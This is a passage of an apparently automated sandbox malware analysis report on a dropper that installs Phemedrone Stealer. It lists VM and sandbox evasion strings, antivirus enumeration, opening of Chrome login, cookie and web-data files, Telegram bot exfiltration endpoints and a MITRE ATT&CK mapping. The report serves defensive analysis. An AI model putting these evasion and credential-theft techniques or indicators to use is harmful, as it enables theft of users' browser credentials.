Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: N6MONYKO.exe, 00000002.00000003.886554436.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\9I
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: N6MONYKO.exe, 00000002.00000003.883952669.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.883531952.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.886460465.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWadobe.io
Source: N6MONYKO.exe, 00000002.00000003.885821510.000000000659A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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)AZ
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: N6MONYKO.exe, 00000002.00000003.883937315.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.887358706.0000000003EEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: 0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, 2JRUV92E.exe, 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, 2JRUV92E.exe.0.dr	Binary or memory string: Hyper-V Video
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 2JRUV92E.exe.0.dr	Binary or memory string: VMware Virtual
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\ProgramData\USOShared\2JRUV92E.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe "C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe"			Jump to behavior
Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Process created: C:\ProgramData\USOShared\2JRUV92E.exe "C:\ProgramData\USOShared\2JRUV92E.exe"			Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: C:\ProgramData\USOShared\2JRUV92E.exe, type: DROPPED

Source: C:\Users\user\Desktop\0nEuHt4Yr4.exe	Queries volume information: C:\Users\user\Desktop\0nEuHt4Yr4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CreativeCloud\ACC\WAM.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	Queries volume information: C:\ProgramData\USOShared\2JRUV92E.exe VolumeInformation	Jump to behavior

Source: C:\ProgramData\USOShared\2JRUV92E.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\USOShared\2JRUV92E.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Source: Amcache.hve.0.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: procexp.exe

Source: C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

Jump to behavior

Stealing of Sensitive Information

Yara detected Phemedrone Stealer

Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.148b8290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.148b8290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.2JRUV92E.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.1464e398.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.1464e398.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0nEuHt4Yr4.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2JRUV92E.exe PID: 7680, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\USOShared\2JRUV92E.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\USOShared\2JRUV92E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.ldb	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000007.ldb	Jump to behavior
Source: C:\ProgramData\USOShared\2JRUV92E.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected Phemedrone Stealer

Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.148b8290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.148b8290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.2JRUV92E.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.1464e398.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0nEuHt4Yr4.exe.1464e398.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0nEuHt4Yr4.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2JRUV92E.exe PID: 7680, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\USOShared\2JRUV92E.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scripting	2 Windows Service	2 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	133 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Scripting	Security Account Manager	351 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Modify Registry	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	261 Virtualization/Sandbox Evasion	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	11 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
0nEuHt4Yr4.exe	58%	ReversingLabs	Win32.Trojan.Generic
0nEuHt4Yr4.exe	100%	Avira	TR/Dropper.Gen2
0nEuHt4Yr4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\USOShared\2JRUV92E.exe	100%	Joe Sandbox ML
C:\ProgramData\USOShared\2JRUV92E.exe	61%	ReversingLabs	ByteCode-MSIL.Spyware.Phemedrone
C:\Users\user\AppData\Roaming\Adobe\N6MONYKO.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://jedwatson.github.io/classnames	0%	URL Reputation	safe
http://rakishev.net/wp-cron.php	0%	Avira URL Cloud	safe
https://delegated.adobelogin.com49075j	0%	Avira URL Cloud	safe
https://ims-prod06.adobelogin.comSrvApi	0%	Avira URL Cloud	safe
https://mths.be/platform	0%	Avira URL Cloud	safe
https://mths.be/mit	0%	Avira URL Cloud	safe
http://allyoucanleet.com/	0%	Avira URL Cloud	safe
https://bnjmnt4n.now.sh/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dd20fzx9mj46f.cloudfront.net	18.164.166.37	true	false	high
rakishev.net	104.21.88.34	true	false	unknown
adobe.com.ssl.d1.sc.omtrdc.net	63.140.36.121	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
auth-cloudfront.prod.ims.adobejanus.com	99.84.203.85	true	false	unknown
ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com	34.215.32.195	true	false	high
d1n897799gitxr.cloudfront.net	13.226.224.37	true	false	high
resources-prod.licensingstack.com	18.154.132.164	true	false	high
dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com	35.160.107.34	true	false	high
use.typekit.net	unknown	unknown	false	high
p.typekit.net	unknown	unknown	false	high
ims-na1.adobelogin.com	unknown	unknown	false	high
dpm.demdex.net	unknown	unknown	false	high
static.adobelogin.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://rakishev.net/wp-cron.php	false	Avira URL Cloud: safe	unknown
https://dpm.demdex.net/id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261	false		high
https://static.adobelogin.com/clients/WAM1_PHSP_21/2x_7ba438462e24c64004988f21d59129d5.png	false		high
http://ip-api.com/json/?fields=11827	false		high
https://dpm.demdex.net/id?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=zh-Hans	CCDInstaller.js.2.dr	false		high
https://ims-prod06.adobelogin.com	N6MONYKO.exe, 00000002.00000003.883937315.0000000003EEC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=zh-Hant	N6MONYKO.exe, 00000002.00000003.884783098.0000000005A39000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.924971714.000000000A998000.00000004.00000800.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://www.behance.net/BramVanhaeren	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/ja-JP/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885499779.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://api.telegram.org/bot	0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, 2JRUV92E.exe, 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, 2JRUV92E.exe.0.dr	false		high
https://support.mozilla.org/sv-SE/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885536661.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/pt-BR/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885518315.000000000B080000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885518315.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://bnjmnt4n.now.sh/	CCDInstaller.js.2.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/en-US/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=pt	N6MONYKO.exe, 00000002.00000003.885518315.000000000B080000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885518315.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/ru-RU/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://www.behance.net/TomHegen	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.behance.net/tomanders	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=pl	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=tr	N6MONYKO.exe, 00000002.00000003.885536661.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885536661.000000000B080000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885547771.000000000B0A0000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=da	CCDInstaller.js.2.dr	false		high
https://www.behance.net/tracieching	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
https://play.google.com/store/apps/dev?id=4734916851270416020	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=de	N6MONYKO.exe, 00000002.00000003.885443825.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885450808.0000000005AA1000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885443825.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://use.typekit.net/af/cb695f/000000000000000000017701/27/	ecr2zvs[1].js.2.dr	false		high
https://support.mozilla.org/fr-FR/kb/where-find-and-manage-downloaded-files-firefox	CCDInstaller.js.2.dr	false		high
https://static.adobelogin.com/clients/WAM1_PHSP_21/1x_7ba438462e24c64004988f21d59129d5.png	context[1].json.2.dr	false		high
https://delegated.adobelogin.com49075j	N6MONYKO.exe, 00000002.00000003.883905595.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.883965159.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.886554436.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mths.be/mit	CCDInstaller.js.2.dr	false	Avira URL Cloud: safe	unknown
https://t.me/reyvortex	0nEuHt4Yr4.exe, 00000000.00000002.894400795.0000000014609000.00000004.00000800.00020000.00000000.sdmp, 2JRUV92E.exe, 00000003.00000000.880822551.00000000006E2000.00000002.00000001.01000000.00000009.sdmp, 2JRUV92E.exe.0.dr	false		high
http://typekit.com/eulas/0000000000000000000176ff	ecr2zvs[1].js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1	CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=cs	N6MONYKO.exe, 00000002.00000003.885426108.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885435309.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885426108.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
http://typekit.com/eulas/000000000000000000017701	ecr2zvs[1].js.2.dr	false		high
https://ims-na1.adobelogin.com/ims	N6MONYKO.exe, 00000002.00000003.921481813.000000000B1C2000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.921344755.000000000B178000.00000004.00000020.00020000.00000000.sdmp	false		high
http://typekit.com/eulas/000000000000000000017703	ecr2zvs[1].js.2.dr	false		high
https://mths.be/platform	CCDInstaller.js.2.dr	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=ko	N6MONYKO.exe, 00000002.00000003.885499779.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885499779.000000000B080000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.google.com/chrome/answer/95759?visit_id=637090496096814473-703968052&rd=1&hl=sv	N6MONYKO.exe, 00000002.00000003.885536661.000000000B08F000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
https://support.mozilla.org/de-DE/kb/where-find-and-manage-downloaded-files-firefox	N6MONYKO.exe, 00000002.00000003.885443825.000000000B07C000.00000004.00000020.00020000.00000000.sdmp, N6MONYKO.exe, 00000002.00000003.885443825.000000000B08B000.00000004.00000020.00020000.00000000.sdmp, CCDInstaller.js.2.dr	false		high
http://jedwatson.github.io/classnames	CCDInstaller.js.2.dr	false	URL Reputation: safe	unknown
